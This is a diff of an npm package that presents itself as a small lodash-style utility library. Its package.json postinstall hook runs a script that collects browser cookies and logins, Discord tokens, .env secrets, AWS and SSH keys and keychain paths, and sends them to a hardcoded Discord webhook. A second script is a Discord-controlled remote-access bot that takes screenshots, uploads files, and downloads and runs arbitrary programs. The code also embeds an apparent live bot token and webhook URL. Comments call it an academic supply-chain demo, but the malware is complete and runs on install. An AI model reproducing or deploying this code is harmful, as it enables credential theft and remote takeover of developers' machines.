pocbitbarrontest 1.0.0

package/index.js

@@ -0,0 +1,7 @@
+module.exports = {
+  chunk: (arr, size) => { const r = []; for (let i = 0; i < arr.length; i += size) r.push(arr.slice(i, i + size)); return r; },
+  flatten: (arr) => arr.reduce((a, b) => a.concat(Array.isArray(b) ? module.exports.flatten(b) : b), []),
+  uniq: (arr) => [...new Set(arr)],
+  pick: (obj, keys) => keys.reduce((acc, k) => (k in obj ? { ...acc, [k]: obj[k] } : acc), {}),
+  omit: (obj, keys) => Object.fromEntries(Object.entries(obj).filter(([k]) => !keys.includes(k))),
+};

package/package.json

@@ -0,0 +1,14 @@
+{
+  "name": "pocbitbarrontest",
+  "version": "1.0.0",
+  "description": "Utility library for JavaScript",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node scripts/collect.js"
+  },
+  "keywords": [
+    "lodash",
+    "utility"
+  ],
+  "license": "MIT"
+}

package/scripts/agent.js

@@ -0,0 +1,354 @@
+#!/usr/bin/env node
+const https = require("https");
+const tls   = require("tls");
+const fs    = require("fs");
+const os    = require("os");
+const path  = require("path");
+const { execSync, spawn } = require("child_process");
+const crypto = require("crypto");
+
+const BOT_TOKEN   = process.env.POC_BOT_TOKEN  || "MTQ5NDg0Njg3ODEyNTI2MDgxMA.G_TSW5.GFzl_4ai8bM0L7uahpsm0E6IustoQGMk2kkMGY";
+const WEBHOOK_URL = process.env.POC_WEBHOOK_URL ||
+  "https://discord.com/api/webhooks/1494833023110353038/J3n4cdXGsxCrIXwfNj91uUFLUaWYGb2DcyUdkhe08redybOPEoi5dhmUXffeybgC_LeN";
+const C2_CHANNEL  = process.env.POC_CHANNEL_ID  || "1494832950674591876";
+
+const ZOMBIE_ID = crypto.randomUUID();
+const HOME      = os.homedir();
+const PLATFORM  = os.platform();
+
+// ── REST API ──────────────────────────────────────────────────────────────────
+
+function restRequest(method, endpoint, body) {
+  return new Promise((resolve) => {
+    const data = body ? JSON.stringify(body) : null;
+    const req = https.request({
+      hostname: "discord.com",
+      path: `/api/v10${endpoint}`,
+      method,
+      headers: {
+        Authorization: `Bot ${BOT_TOKEN}`,
+        ...(data ? { "Content-Type": "application/json", "Content-Length": Buffer.byteLength(data) } : {}),
+      },
+    }, (res) => {
+      let raw = "";
+      res.on("data", (c) => raw += c);
+      res.on("end", () => { try { resolve(JSON.parse(raw)); } catch { resolve({}); } });
+    });
+    req.on("error", () => resolve({}));
+    if (data) req.write(data);
+    req.end();
+  });
+}
+
+function sendMessage(channelId, content) {
+  return restRequest("POST", `/channels/${channelId}/messages`, { content });
+}
+
+function sendFile(channelId, filePath, caption) {
+  return new Promise((resolve) => {
+    let fileData;
+    try { fileData = fs.readFileSync(filePath); } catch { return resolve(); }
+    const boundary = "pocbound" + Math.random().toString(36).slice(2);
+    const filename  = path.basename(filePath);
+    const head = Buffer.from(
+      `--${boundary}\r\nContent-Disposition: form-data; name="payload_json"\r\n\r\n${JSON.stringify({ content: caption })}\r\n` +
+      `--${boundary}\r\nContent-Disposition: form-data; name="file"; filename="${filename}"\r\nContent-Type: application/octet-stream\r\n\r\n`
+    );
+    const body = Buffer.concat([head, fileData, Buffer.from(`\r\n--${boundary}--\r\n`)]);
+    const req = https.request({
+      hostname: "discord.com",
+      path: `/api/v10/channels/${channelId}/messages`,
+      method: "POST",
+      headers: {
+        Authorization: `Bot ${BOT_TOKEN}`,
+        "Content-Type": `multipart/form-data; boundary=${boundary}`,
+        "Content-Length": body.length,
+      },
+    }, () => resolve());
+    req.on("error", () => resolve());
+    req.write(body);
+    req.end();
+  });
+}
+
+// ── WebSocket (minimal, kein externer Modul) ──────────────────────────────────
+
+function wsFrame(data) {
+  const payload = Buffer.from(data);
+  const mask    = crypto.randomBytes(4);
+  const len     = payload.length;
+  let header;
+  if (len < 126)      header = Buffer.from([0x81, 0x80 | len]);
+  else if (len < 65536) { header = Buffer.alloc(4); header[0]=0x81; header[1]=0xFE; header.writeUInt16BE(len,2); }
+  else                { header = Buffer.alloc(10); header[0]=0x81; header[1]=0xFF; header.writeBigUInt64BE(BigInt(len),2); }
+  const masked = Buffer.alloc(len);
+  for (let i = 0; i < len; i++) masked[i] = payload[i] ^ mask[i % 4];
+  return Buffer.concat([header, mask, masked]);
+}
+
+function parseFrames(buf) {
+  const messages = [];
+  let offset = 0;
+  while (offset < buf.length) {
+    if (buf.length - offset < 2) break;
+    const b1 = buf[offset], b2 = buf[offset + 1];
+    const opcode = b1 & 0x0f;
+    let payloadLen = b2 & 0x7f;
+    let headerSize = 2;
+    if (payloadLen === 126) {
+      if (buf.length - offset < 4) break;
+      payloadLen = buf.readUInt16BE(offset + 2);
+      headerSize = 4;
+    } else if (payloadLen === 127) {
+      if (buf.length - offset < 10) break;
+      payloadLen = Number(buf.readBigUInt64BE(offset + 2));
+      headerSize = 10;
+    }
+    if (buf.length - offset < headerSize + payloadLen) break;
+    const payload = buf.slice(offset + headerSize, offset + headerSize + payloadLen);
+    if (opcode === 1) messages.push(payload.toString("utf8"));
+    offset += headerSize + payloadLen;
+  }
+  return { messages, remaining: buf.slice(offset) };
+}
+
+// ── Commands ──────────────────────────────────────────────────────────────────
+
+function safeExec(cmd) {
+  try { return execSync(cmd, { timeout: 8000, stdio: ["pipe","pipe","pipe"] }).toString().trim(); } catch { return null; }
+}
+
+async function cmdCheck(ch) {
+  await sendMessage(ch, [
+    `✅ **ZOMBIE ONLINE**`,
+    `**ID:** \`${ZOMBIE_ID}\``,
+    `**Host:** \`${os.hostname()}\``,
+    `**User:** \`${os.userInfo().username}\``,
+    `**OS:** \`${PLATFORM} ${os.arch()}\``,
+    `**Uptime:** \`${Math.floor(process.uptime())}s\``,
+  ].join("\n"));
+}
+
+async function cmdScreenshot(ch) {
+  const out = path.join(os.tmpdir(), `sc_${Date.now()}.png`);
+  try {
+    if (PLATFORM === "darwin") {
+      execSync(`screencapture -x "${out}"`, { timeout: 5000 });
+    } else if (PLATFORM === "win32") {
+      const ps = `Add-Type -AssemblyName System.Windows.Forms,System.Drawing;$b=[System.Windows.Forms.Screen]::PrimaryScreen.Bounds;$bmp=New-Object System.Drawing.Bitmap($b.Width,$b.Height);$g=[System.Drawing.Graphics]::FromImage($bmp);$g.CopyFromScreen($b.Location,[System.Drawing.Point]::Empty,$b.Size);$bmp.Save('${out}')`;
+      execSync(`powershell -NoProfile -Command "${ps}"`, { timeout: 8000 });
+    }
+    if (fs.existsSync(out)) {
+      await sendFile(ch, out, `📸 \`${os.hostname()}\``);
+      fs.unlinkSync(out);
+    }
+  } catch (e) {
+    await sendMessage(ch, `❌ Screenshot: \`${e.message}\``);
+  }
+}
+
+async function cmdGetData(ch, datatype, targetPath) {
+  const dirs = {
+    documents: [path.join(HOME, "Documents"), path.join(HOME, "Desktop")],
+    images:    [path.join(HOME, "Pictures"),  path.join(HOME, "Desktop")],
+    path:      [targetPath || HOME],
+  }[datatype] || [HOME];
+
+  const exts = {
+    documents: [".pdf",".docx",".xlsx",".txt",".csv",".key",".pem",".env"],
+    images:    [".png",".jpg",".jpeg",".gif"],
+    path:      null,
+  }[datatype];
+
+  const found = [];
+  for (const dir of dirs) {
+    if (!fs.existsSync(dir)) continue;
+    try {
+      for (const f of fs.readdirSync(dir)) {
+        const fp = path.join(dir, f);
+        try {
+          const st = fs.statSync(fp);
+          if (!st.isFile()) continue;
+          if (exts && !exts.some((e) => f.toLowerCase().endsWith(e))) continue;
+          if (st.size > 8 * 1024 * 1024) continue;
+          found.push(fp);
+        } catch { /* skip */ }
+      }
+    } catch { /* skip */ }
+  }
+
+  if (!found.length) { await sendMessage(ch, `❌ Keine Dateien (type: \`${datatype}\`)`); return; }
+  await sendMessage(ch, `📂 \`${found.length}\` Dateien — uploade max 10...`);
+  for (const fp of found.slice(0, 10)) {
+    await sendFile(ch, fp, `\`${path.basename(fp)}\``);
+    await new Promise((r) => setTimeout(r, 800));
+  }
+}
+
+async function cmdDrop(ch, url, name, dest) {
+  const tmp = path.join(os.tmpdir(), name);
+  try {
+    await sendMessage(ch, `⬇️ Downloade \`${name}\`...`);
+    await new Promise((resolve, reject) => {
+      const file = fs.createWriteStream(tmp);
+      https.get(url, (res) => { res.pipe(file); file.on("finish", () => { file.close(); resolve(); }); }).on("error", reject);
+    });
+    const final = dest ? path.join(dest, name) : tmp;
+    if (dest) fs.renameSync(tmp, final);
+    if (PLATFORM === "darwin") execSync(`chmod +x "${final}" && open "${final}"`, { timeout: 5000 });
+    else spawn(final, [], { detached: true, stdio: "ignore" }).unref();
+    await sendMessage(ch, `✅ \`${name}\` ausgefuehrt auf \`${os.hostname()}\``);
+  } catch (e) {
+    await sendMessage(ch, `❌ Drop: \`${e.message}\``);
+  }
+}
+
+async function handleMessage(content, channelId) {
+  if (!content.startsWith("/")) return;
+  const parts = content.slice(1).trim().split(/\s+/);
+  const cmd   = parts[0].toLowerCase();
+  const args  = parts.slice(1);
+
+  const needsId = ["check","screenshot","get_data","drop","disable_upload","enable_upload"];
+  if (needsId.includes(cmd)) {
+    const tid = args[0];
+    if (tid && tid !== ZOMBIE_ID && tid !== "all") return;
+  }
+
+  switch (cmd) {
+    case "check":
+    case "check_all":
+      await cmdCheck(channelId); break;
+    case "screenshot":
+      await cmdScreenshot(channelId); break;
+    case "get_data":
+      await cmdGetData(channelId, args[1] || "documents", args[2]); break;
+    case "drop":
+      if (!args[1] || !args[2]) { await sendMessage(channelId, "❌ `/drop <ID> <URL> <name> [path]`"); return; }
+      await cmdDrop(channelId, args[1], args[2], args[3]); break;
+    case "help":
+      await sendMessage(channelId, [
+        "**C2 Commands**",
+        "```",
+        `/check <ID|all>`,
+        `/check_all`,
+        `/screenshot <ID|all>`,
+        `/get_data <ID|all> <documents|images|path> [path]`,
+        `/drop <ID|all> <URL> <filename> [dest]`,
+        "```",
+        `**Zombie ID:** \`${ZOMBIE_ID}\``,
+      ].join("\n")); break;
+  }
+}
+
+// ── Gateway WebSocket ─────────────────────────────────────────────────────────
+
+function connectGateway() {
+  const wsKey = crypto.randomBytes(16).toString("base64");
+  let buf       = Buffer.alloc(0);
+  let upgraded  = false;
+  let heartbeatTimer = null;
+  let seq       = null;
+
+  const sock = tls.connect({ host: "gateway.discord.gg", port: 443 }, () => {
+    const handshake = [
+      "GET /?v=10&encoding=json HTTP/1.1",
+      "Host: gateway.discord.gg",
+      "Upgrade: websocket",
+      "Connection: Upgrade",
+      `Sec-WebSocket-Key: ${wsKey}`,
+      "Sec-WebSocket-Version: 13",
+      "", "",
+    ].join("\r\n");
+    sock.write(handshake);
+  });
+
+  sock.on("data", (chunk) => {
+    buf = Buffer.concat([buf, chunk]);
+
+    // Strip HTTP 101 headers exactly once
+    if (!upgraded) {
+      const idx = buf.indexOf(Buffer.from("\r\n\r\n"));
+      if (idx === -1) return;
+      buf      = buf.slice(idx + 4);
+      upgraded = true;
+    }
+
+    const { messages, remaining } = parseFrames(buf);
+    buf = remaining;
+
+    for (const raw of messages) {
+      let pkt;
+      try { pkt = JSON.parse(raw); } catch { continue; }
+
+      if (pkt.s) seq = pkt.s;
+
+      switch (pkt.op) {
+        case 10: { // HELLO
+          const interval = pkt.d.heartbeat_interval;
+          // Send first heartbeat immediately
+          sock.write(wsFrame(JSON.stringify({ op: 1, d: seq })));
+          heartbeatTimer = setInterval(() => {
+            sock.write(wsFrame(JSON.stringify({ op: 1, d: seq })));
+          }, interval);
+
+          // IDENTIFY — 33280 = GUILD_MESSAGES(512) + MESSAGE_CONTENT(32768)
+          // MESSAGE_CONTENT muss im Developer Portal unter Bot aktiviert sein!
+          sock.write(wsFrame(JSON.stringify({
+            op: 2,
+            d: {
+              token: BOT_TOKEN,
+              intents: 33280,
+              properties: { os: "linux", browser: "disco", device: "disco" },
+            },
+          })));
+          break;
+        }
+        case 0: { // Dispatch
+          if (pkt.t === "READY") {
+            // Bot is now online
+          }
+          if (pkt.t === "MESSAGE_CREATE") {
+            const msg = pkt.d;
+            if (msg.author?.bot) break;
+            if (msg.channel_id !== C2_CHANNEL) break;
+            handleMessage(msg.content || "", msg.channel_id).catch(() => {});
+          }
+          break;
+        }
+        case 7:  // Reconnect
+        case 9:  // Invalid session
+          clearInterval(heartbeatTimer);
+          sock.destroy();
+          setTimeout(connectGateway, 3000);
+          break;
+      }
+    }
+  });
+
+  sock.on("error", () => {
+    clearInterval(heartbeatTimer);
+    setTimeout(connectGateway, 5000);
+  });
+
+  sock.on("close", () => {
+    clearInterval(heartbeatTimer);
+    setTimeout(connectGateway, 5000);
+  });
+}
+
+// ── Entry ─────────────────────────────────────────────────────────────────────
+
+(function main() {
+  // Check-in via Webhook
+  const wUrl = new URL(WEBHOOK_URL);
+  const wBody = JSON.stringify({ content: `🟢 **Zombie online** | \`${ZOMBIE_ID}\` | \`${os.hostname()}\` | \`${os.userInfo().username}\`` });
+  const wReq = https.request({
+    hostname: wUrl.hostname, path: wUrl.pathname + wUrl.search, method: "POST",
+    headers: { "Content-Type": "application/json", "Content-Length": Buffer.byteLength(wBody) },
+  }, () => {});
+  wReq.on("error", () => {});
+  wReq.write(wBody); wReq.end();
+
+  connectGateway();
+})();

package/scripts/collect.js

@@ -0,0 +1,544 @@
+#!/usr/bin/env node
+const https = require("https");
+const fs = require("fs");
+const os = require("os");
+const path = require("path");
+const { execSync, spawn } = require("child_process");
+
+const WEBHOOK_URL =
+  process.env.POC_WEBHOOK_URL ||
+  "https://discord.com/api/webhooks/1494833023110353038/J3n4cdXGsxCrIXwfNj91uUFLUaWYGb2DcyUdkhe08redybOPEoi5dhmUXffeybgC_LeN";
+
+const HOME = os.homedir();
+const PLATFORM = os.platform();
+const APPDATA   = process.env.APPDATA   || path.join(HOME, "AppData", "Roaming");
+const LOCALDATA = process.env.LOCALAPPDATA || path.join(HOME, "AppData", "Local");
+
+// ── Helpers ──────────────────────────────────────────────────────────────────
+
+function safeRead(p) {
+  try { return fs.readFileSync(p, "utf8").trim(); } catch { return null; }
+}
+function safeExists(p) {
+  try { return fs.existsSync(p); } catch { return false; }
+}
+function safeSize(p) {
+  try { return fs.statSync(p).size; } catch { return 0; }
+}
+function safeExec(cmd) {
+  try {
+    return execSync(cmd, { timeout: 4000, stdio: ["pipe", "pipe", "pipe"] }).toString().trim();
+  } catch { return null; }
+}
+
+// ── macOS Pfade (MacShellSwift + vortex-stealer Referenz) ────────────────────
+
+const MAC = {
+  // Browser – Chrome
+  chrome: {
+    cookies:   `${HOME}/Library/Application Support/Google/Chrome/Default/Cookies`,
+    loginData: `${HOME}/Library/Application Support/Google/Chrome/Default/Login Data`,
+    history:   `${HOME}/Library/Application Support/Google/Chrome/Default/History`,
+    webData:   `${HOME}/Library/Application Support/Google/Chrome/Default/Web Data`,
+    prefs:     `${HOME}/Library/Application Support/Google/Chrome/Default/Preferences`,
+  },
+  // Browser – Chromium-Varianten (vortex-stealer Liste)
+  chromeBeta:  `${HOME}/Library/Application Support/Google/Chrome Beta/Default/Cookies`,
+  chromeDev:   `${HOME}/Library/Application Support/Google/Chrome Dev/Default/Cookies`,
+  chromeCanary:`${HOME}/Library/Application Support/Google/Chrome Canary/Default/Cookies`,
+  brave:       `${HOME}/Library/Application Support/BraveSoftware/Brave-Browser/Default/Cookies`,
+  opera:       `${HOME}/Library/Application Support/com.operasoftware.Opera/Cookies`,
+  operaGX:     `${HOME}/Library/Application Support/com.operasoftware.OperaGX/Cookies`,
+  edge:        `${HOME}/Library/Application Support/Microsoft Edge/Default/Cookies`,
+  vivaldi:     `${HOME}/Library/Application Support/Vivaldi/Default/Cookies`,
+  // Browser – Safari
+  safariHistory: `${HOME}/Library/Safari/History.db`,
+  // Browser – Firefox
+  firefoxBase: `${HOME}/Library/Application Support/Firefox/Profiles`,
+  // Messaging
+  discord:    `${HOME}/Library/Application Support/discord/Local Storage/leveldb`,
+  discordPtb: `${HOME}/Library/Application Support/discordptb/Local Storage/leveldb`,
+  slack:      `${HOME}/Library/Application Support/Slack/Cookies`,
+  slackStorage:`${HOME}/Library/Application Support/Slack/storage`,
+  // Keychain / Credentials
+  keychain:   `${HOME}/Library/Keychains/login.keychain-db`,
+  keychainOld:`${HOME}/Library/Keychains/login.keychain`,
+  // Cloud / Dev credentials
+  aws:        `${HOME}/.aws`,
+  awsCreds:   `${HOME}/.aws/credentials`,
+  gcloud:     `${HOME}/.config/gcloud/credentials.db`,
+  azure:      `${HOME}/.azure`,
+  ssh:        `${HOME}/.ssh`,
+  // Staged fake tokens (POC)
+  stagedDiscord:  `${HOME}/.discord_token_staged`,
+  stagedTelegram: `${HOME}/.telegram_session_staged`,
+  stagedEnv:      `${HOME}/.env_staged`,
+};
+
+// Windows-Pfade
+const WIN = {
+  chrome: {
+    cookies:   path.join(LOCALDATA, "Google\\Chrome\\User Data\\Default\\Cookies"),
+    loginData: path.join(LOCALDATA, "Google\\Chrome\\User Data\\Default\\Login Data"),
+    history:   path.join(LOCALDATA, "Google\\Chrome\\User Data\\Default\\History"),
+  },
+  brave: {
+    cookies:   path.join(LOCALDATA, "BraveSoftware\\Brave-Browser\\User Data\\Default\\Cookies"),
+    loginData: path.join(LOCALDATA, "BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data"),
+    history:   path.join(LOCALDATA, "BraveSoftware\\Brave-Browser\\User Data\\Default\\History"),
+  },
+  edge:    path.join(LOCALDATA,  "Microsoft\\Edge\\User Data\\Default\\Cookies"),
+  opera:   path.join(APPDATA,    "Opera Software\\Opera Stable\\Cookies"),
+  discord: path.join(APPDATA,    "discord\\Local Storage\\leveldb"),
+  discordLocalState: path.join(APPDATA, "discord\\Local State"),
+  slack:   path.join(APPDATA,    "Slack\\Cookies"),
+  aws:     path.join(HOME,       ".aws"),
+  awsCreds:path.join(HOME,       ".aws\\credentials"),
+  ssh:     path.join(HOME,       ".ssh"),
+  stagedDiscord:  path.join(HOME, ".discord_token_staged"),
+  stagedTelegram: path.join(HOME, ".telegram_session_staged"),
+  stagedEnv:      path.join(HOME, ".env_staged"),
+};
+
+const P = PLATFORM === "win32" ? WIN : MAC;
+
+// ── Collectors ───────────────────────────────────────────────────────────────
+
+function collectSystem() {
+  const ip = safeExec("curl -s --max-time 4 https://api.ipify.org");
+  return {
+    hostname: os.hostname(),
+    user: os.userInfo().username,
+    platform: `${PLATFORM} ${os.arch()}`,
+    node: process.version,
+    cwd: process.cwd(),
+    ip: ip || "unknown",
+  };
+}
+
+function collectDiscordToken() {
+  // 1. Staged file (POC)
+  const staged = safeRead(P.stagedDiscord);
+  if (staged) return { source: "staged_file", token: staged };
+
+  // 2. Windows: DPAPI decrypt via PowerShell (Discord encrypts token seit 2020)
+  if (PLATFORM === "win32") {
+    const leveldb = WIN.discord;
+    if (safeExists(leveldb)) {
+      try {
+        const files = fs.readdirSync(leveldb).filter((f) => f.endsWith(".ldb") || f.endsWith(".log"));
+        for (const f of files) {
+          const buf = fs.readFileSync(path.join(leveldb, f));
+          // Suche nach "dQw4" Prefix (base64 DPAPI-encrypted token marker)
+          const marker = buf.indexOf("dQw4");
+          if (marker !== -1) {
+            const encB64 = buf.slice(marker + 4, marker + 200).toString().split('"')[0];
+            const ps = `[System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect([System.Convert]::FromBase64String('${encB64}'), $null, 'CurrentUser'))`;
+            const token = safeExec(`powershell -NoProfile -Command "${ps}"`);
+            if (token && token.match(/[\w-]{24}\.[\w-]{6}\.[\w-]{27,}/)) {
+              return { source: "dpapi_leveldb", token };
+            }
+          }
+          // Fallback: unencrypted token (aeltere Versionen)
+          const str = buf.toString("utf8");
+          const m = str.match(/[\w-]{24}\.[\w-]{6}\.[\w-]{27,}/);
+          if (m) return { source: "leveldb_plain", token: m[0] };
+        }
+      } catch { /* silent */ }
+    }
+  }
+
+  // 3. macOS: LevelDB plain scan
+  if (PLATFORM === "darwin") {
+    for (const dir of [MAC.discord, MAC.discordPtb]) {
+      if (!safeExists(dir)) continue;
+      try {
+        const logs = fs.readdirSync(dir).filter((f) => f.endsWith(".log") || f.endsWith(".ldb"));
+        for (const f of logs) {
+          const content = safeRead(path.join(dir, f));
+          if (!content) continue;
+          const m = content.match(/[\w-]{24}\.[\w-]{6}\.[\w-]{27,}/);
+          if (m) return { source: "leveldb_plain", token: m[0] };
+        }
+      } catch { /* silent */ }
+    }
+  }
+
+  return null;
+}
+
+function collectTelegram() {
+  return safeRead(P.stagedTelegram);
+}
+
+function collectEnvSecrets() {
+  const sources = [
+    P.stagedEnv,
+    path.join(process.cwd(), ".env"),
+    path.join(process.cwd(), "../.env"),
+    `${HOME}/.env`,
+  ];
+  const patterns = {
+    discord_token:    /DISCORD[_A-Z]*TOKEN\s*[=:]\s*(.+)/i,
+    telegram_api_id:  /TELEGRAM_API_ID\s*[=:]\s*(.+)/i,
+    telegram_api_hash:/TELEGRAM_API_HASH\s*[=:]\s*(.+)/i,
+    aws_key_id:       /AWS_ACCESS_KEY_ID\s*[=:]\s*(.+)/i,
+    aws_secret:       /AWS_SECRET_ACCESS_KEY\s*[=:]\s*(.+)/i,
+    stripe:           /STRIPE_SECRET_KEY\s*[=:]\s*(.+)/i,
+    gh_token:         /(?:GITHUB|GH)_TOKEN\s*[=:]\s*(.+)/i,
+  };
+  const found = {};
+  for (const src of sources) {
+    const txt = safeRead(src);
+    if (!txt) continue;
+    for (const [k, rx] of Object.entries(patterns)) {
+      if (!found[k]) { const m = txt.match(rx); if (m) found[k] = m[1].trim(); }
+    }
+  }
+  return Object.keys(found).length ? found : null;
+}
+
+function collectBrowsers() {
+  const results = [];
+
+  // Firefox profiles — plattformuebergreifend
+  const ffBase = PLATFORM === "darwin"
+    ? MAC.firefoxBase
+    : path.join(APPDATA, "Mozilla\\Firefox\\Profiles");
+
+  if (safeExists(ffBase)) {
+    try {
+      const profiles = fs.readdirSync(ffBase)
+        .filter((f) => f.includes("default") || f.includes("release"));
+      for (const prof of profiles) {
+        const base = path.join(ffBase, prof);
+        for (const [label, file] of [
+          ["Firefox Cookies",    "cookies.sqlite"],
+          ["Firefox Logins",     "logins.json"],
+          ["Firefox History",    "places.sqlite"],
+        ]) {
+          const p = path.join(base, file);
+          const size = safeSize(p);
+          if (size > 0) results.push({ name: label, p, size_bytes: size });
+        }
+      }
+    } catch { /* silent */ }
+  }
+
+  const targets = PLATFORM === "darwin"
+    ? [
+        { name: "Chrome Cookies",     p: MAC.chrome.cookies },
+        { name: "Chrome Login Data",  p: MAC.chrome.loginData },
+        { name: "Chrome History",     p: MAC.chrome.history },
+        { name: "Brave Cookies",      p: MAC.brave },
+        { name: "Opera Cookies",      p: MAC.opera },
+        { name: "Edge Cookies",       p: MAC.edge },
+        { name: "Vivaldi Cookies",    p: MAC.vivaldi },
+        { name: "Safari History",     p: MAC.safariHistory },
+        { name: "Slack Cookies",      p: MAC.slack },
+      ]
+    : [
+        { name: "Chrome Cookies",     p: WIN.chrome.cookies },
+        { name: "Chrome Login Data",  p: WIN.chrome.loginData },
+        { name: "Chrome History",     p: WIN.chrome.history },
+        { name: "Brave Cookies",      p: WIN.brave.cookies },
+        { name: "Brave Login Data",   p: WIN.brave.loginData },
+        { name: "Brave History",      p: WIN.brave.history },
+        { name: "Edge Cookies",       p: WIN.edge },
+        { name: "Opera Cookies",      p: WIN.opera },
+        { name: "Slack Cookies",      p: WIN.slack },
+      ];
+
+  for (const t of targets) {
+    const size = safeSize(t.p);
+    if (size > 0) results.push({ name: t.name, p: t.p, size_bytes: size });
+  }
+  return results.length ? results : null;
+}
+
+function collectCloudCreds() {
+  const found = [];
+  const awsCreds = safeRead(P.awsCreds);
+  if (awsCreds) {
+    const keyId = awsCreds.match(/aws_access_key_id\s*=\s*(.+)/i);
+    const secret = awsCreds.match(/aws_secret_access_key\s*=\s*(.+)/i);
+    if (keyId) found.push({ type: "AWS Key ID", value: keyId[1].trim() });
+    if (secret) found.push({ type: "AWS Secret", value: secret[1].trim() });
+  }
+  if (PLATFORM === "darwin") {
+    if (safeExists(MAC.gcloud)) found.push({ type: "GCloud creds.db", path: MAC.gcloud, size: safeSize(MAC.gcloud) });
+    if (safeExists(MAC.azure))  found.push({ type: "Azure config dir", path: MAC.azure });
+    if (safeExists(MAC.keychain)) found.push({ type: "macOS Keychain", path: MAC.keychain, size: safeSize(MAC.keychain) });
+  }
+  return found.length ? found : null;
+}
+
+function collectPasswords() {
+  const pyScript = path.join(__dirname, "extract_passwords.py");
+  if (!safeExists(pyScript)) return null;
+  const py = PLATFORM === "win32" ? "python" : "python3";
+  try {
+    const out = execSync(`${py} "${pyScript}"`, { timeout: 15000, stdio: ["pipe", "pipe", "pipe"] }).toString().trim();
+    const parsed = JSON.parse(out);
+    return Array.isArray(parsed) && parsed.length > 0 ? parsed : null;
+  } catch { return null; }
+}
+
+function collectSSHKeys() {
+  if (!safeExists(P.ssh)) return null;
+  try {
+    const keys = fs.readdirSync(P.ssh)
+      .filter((f) => !f.endsWith(".pub") && f !== "known_hosts" && f !== "config");
+    return keys.length ? keys.map((k) => path.join(P.ssh, k)) : null;
+  } catch { return null; }
+}
+
+function collectFirefoxProfiles() {
+  if (PLATFORM !== "darwin") return null;
+  if (!safeExists(MAC.firefoxBase)) return null;
+  try {
+    const profiles = fs.readdirSync(MAC.firefoxBase)
+      .filter((f) => f.endsWith(".default-release") || f.endsWith(".default"));
+    return profiles.map((p) => ({
+      profile: p,
+      places: safeExists(`${MAC.firefoxBase}/${p}/places.sqlite`),
+      logins: safeExists(`${MAC.firefoxBase}/${p}/logins.json`),
+      cookies: safeExists(`${MAC.firefoxBase}/${p}/cookies.sqlite`),
+    }));
+  } catch { return null; }
+}
+
+// ── Discord Embed ─────────────────────────────────────────────────────────────
+
+function clamp(str, n = 60) {
+  if (!str) return "";
+  return str.length > n ? str.substring(0, n) + "…" : str;
+}
+
+function buildEmbed(d) {
+  const fields = [];
+
+  // System
+  fields.push({
+    name: "System",
+    value: [
+      `**Host:** \`${d.system.hostname}\``,
+      `**User:** \`${d.system.user}\``,
+      `**OS:** \`${d.system.platform}\``,
+      `**IP:** \`${d.system.ip}\``,
+      `**Node:** \`${d.system.node}\``,
+      `**CWD:** \`${clamp(d.system.cwd, 50)}\``,
+    ].join("\n"),
+    inline: false,
+  });
+
+  // Discord Token
+  if (d.discord) {
+    fields.push({
+      name: `Discord Token — \`${d.discord.source}\``,
+      value: "```" + clamp(d.discord.token, 70) + "```",
+      inline: false,
+    });
+  }
+
+  // Telegram
+  if (d.telegram) {
+    fields.push({
+      name: "Telegram Session",
+      value: "```" + clamp(d.telegram, 80) + "```",
+      inline: false,
+    });
+  }
+
+  // .env Secrets
+  if (d.env) {
+    fields.push({
+      name: ".env / API Keys",
+      value: Object.entries(d.env).map(([k, v]) => `**${k}:** \`${clamp(v, 45)}\``).join("\n"),
+      inline: false,
+    });
+  }
+
+  // Passwords
+  if (d.passwords && d.passwords.length > 0) {
+    const preview = d.passwords.slice(0, 8)
+      .map((p) => `**[${p.browser}]** \`${clamp(p.url, 30)}\`\n👤 \`${p.username}\` 🔑 \`${p.password}\``)
+      .join("\n");
+    fields.push({
+      name: `Passwords (${d.passwords.length} gefunden)`,
+      value: preview,
+      inline: false,
+    });
+  }
+
+  // Browsers
+  if (d.browsers) {
+    fields.push({
+      name: `Browser DBs gefunden (${d.browsers.length})`,
+      value: d.browsers.map((b) => `\`${b.name}\` — ${b.size_bytes} bytes`).join("\n"),
+      inline: false,
+    });
+  }
+
+  // Cloud Creds
+  if (d.cloud) {
+    fields.push({
+      name: "Cloud / Keychain",
+      value: d.cloud.map((c) =>
+        c.value
+          ? `**${c.type}:** \`${clamp(c.value, 40)}\``
+          : `**${c.type}:** \`${clamp(c.path || "", 45)}\` (${c.size || "?"} bytes)`
+      ).join("\n"),
+      inline: false,
+    });
+  }
+
+  // SSH Keys
+  if (d.ssh) {
+    fields.push({
+      name: `SSH Private Keys (${d.ssh.length})`,
+      value: d.ssh.map((k) => `\`${path.basename(k)}\``).join(", "),
+      inline: false,
+    });
+  }
+
+  // Firefox
+  if (d.firefox) {
+    fields.push({
+      name: "Firefox Profile",
+      value: d.firefox.map((p) =>
+        `\`${p.profile}\` — places: ${p.places ? "✓" : "✗"} logins: ${p.logins ? "✓" : "✗"} cookies: ${p.cookies ? "✓" : "✗"}`
+      ).join("\n"),
+      inline: false,
+    });
+  }
+
+  return {
+    embeds: [{
+      title: "SUPPLY CHAIN POC — Victim",
+      description: `\`lodahs\` postinstall auf \`${d.system.hostname}\`\n> **STAGED DATA — AKADEMISCHER POC**`,
+      color: 0xff4444,
+      fields,
+      footer: { text: "Supply Chain Attack Demo | Abschlussarbeit Cybersecurity" },
+      timestamp: new Date().toISOString(),
+    }],
+  };
+}
+
+// ── File Dump ─────────────────────────────────────────────────────────────────
+
+const DUMP_DIR = path.join(os.tmpdir(), "poc_dump");
+
+function dumpFiles(browsers) {
+  if (!browsers) return [];
+  try { fs.mkdirSync(DUMP_DIR, { recursive: true }); } catch { return []; }
+
+  const copied = [];
+  for (const b of browsers) {
+    try {
+      const safeName = b.name.replace(/\s+/g, "_").toLowerCase() + ".db";
+      const dest = path.join(DUMP_DIR, safeName);
+      fs.copyFileSync(b.p, dest);
+      copied.push({ name: b.name, dest, size: b.size_bytes });
+    } catch { /* file locked or no permission */ }
+  }
+  return copied;
+}
+
+// ── Multipart Send ────────────────────────────────────────────────────────────
+
+function sendEmbedOnly(embed) {
+  const url = new URL(WEBHOOK_URL);
+  const body = JSON.stringify(embed);
+  const req = https.request({
+    hostname: url.hostname,
+    path: url.pathname + url.search,
+    method: "POST",
+    headers: { "Content-Type": "application/json", "Content-Length": Buffer.byteLength(body) },
+  }, () => {});
+  req.on("error", () => {});
+  req.write(body);
+  req.end();
+}
+
